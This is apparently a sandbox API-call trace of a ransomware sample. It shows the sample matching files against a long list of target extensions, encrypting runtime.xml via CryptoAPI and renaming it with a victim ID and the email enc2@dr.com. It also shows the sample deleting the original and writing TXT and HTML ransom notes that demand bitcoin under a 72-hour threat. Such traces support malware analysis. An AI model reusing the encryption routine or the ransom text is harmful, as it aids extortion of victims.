	[0175.610] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml"
	[0175.610] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml") returned 97
	[0175.610] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.611] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml") returned 0x61
	[0175.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.611] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.611] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"
	[0175.611] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml") returned 97
	[0175.611] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.612] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.612] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.612] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.612] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.612] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.613] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.613] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.613] ReadFile (in: hFile=0x39c, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x139, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x189930*=0x139, lpOverlapped=0x0) returned 1
	[0175.617] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.617] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb770) returned 1
	[0175.620] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.620] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0175.620] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.621] CryptHashData (hHash=0xfb8ef0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.621] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb8ef0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb91f0) returned 1
	[0175.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.621] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x139, dwBufLen=0x139 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x140) returned 1
	[0175.621] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.622] RtlMoveMemory (in: Destination=0xfdc770, Source=0xfdcd58, Length=0x139 | out: Destination=0xfdc770) 
	[0175.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.622] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x139, dwBufLen=0x140 | out: pbData=0xfdc770*, pdwDataLen=0x1894dc*=0x140) returned 1
	[0175.622] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.623] CryptDestroyKey (hKey=0xfb91f0) returned 1
	[0175.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.623] CryptDestroyHash (hHash=0xfb8ef0) returned 1
	[0175.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.623] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0175.623] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.624] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.624] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.624] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0175.625] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 139
	[0175.625] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0175.626] WriteFile (in: hFile=0x3a0, lpBuffer=0xfdc770*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfdc770*, lpNumberOfBytesWritten=0x189938*=0x140, lpOverlapped=0x0) returned 1
	[0175.629] CloseHandle (hObject=0x3a0) returned 1
	[0175.629] CloseHandle (hObject=0x39c) returned 1
	[0175.629] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml")) returned 1
	[0175.632] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\runtime.xml")) returned 0
	[0175.633] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ed2c64, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ed2c64, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0ef8ed0, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x320062, dwReserved1=0x7d0036, cFileName="RunTime.xml", cAlternateFileName="")) returned 0
	[0175.633] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0175.633] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0175.633] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov"
	[0175.634] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\*.*"
	[0175.634] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.634] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.634] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0175.634] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.635] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.635] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.639] CloseHandle (hObject=0x390) returned 1
	[0175.639] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.640] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.640] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0175.641] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.641] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.641] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.641] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.641] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0175.642] CloseHandle (hObject=0x390) returned 1
	[0175.642] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.642] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.642] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.642] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0175.642] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.647] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.647] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0175.650] CloseHandle (hObject=0x390) returned 1
	[0175.650] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.650] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.658] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.658] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0175.659] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.659] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\Prov\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\prov\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.659] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.660] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.660] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0175.660] CloseHandle (hObject=0x390) returned 1
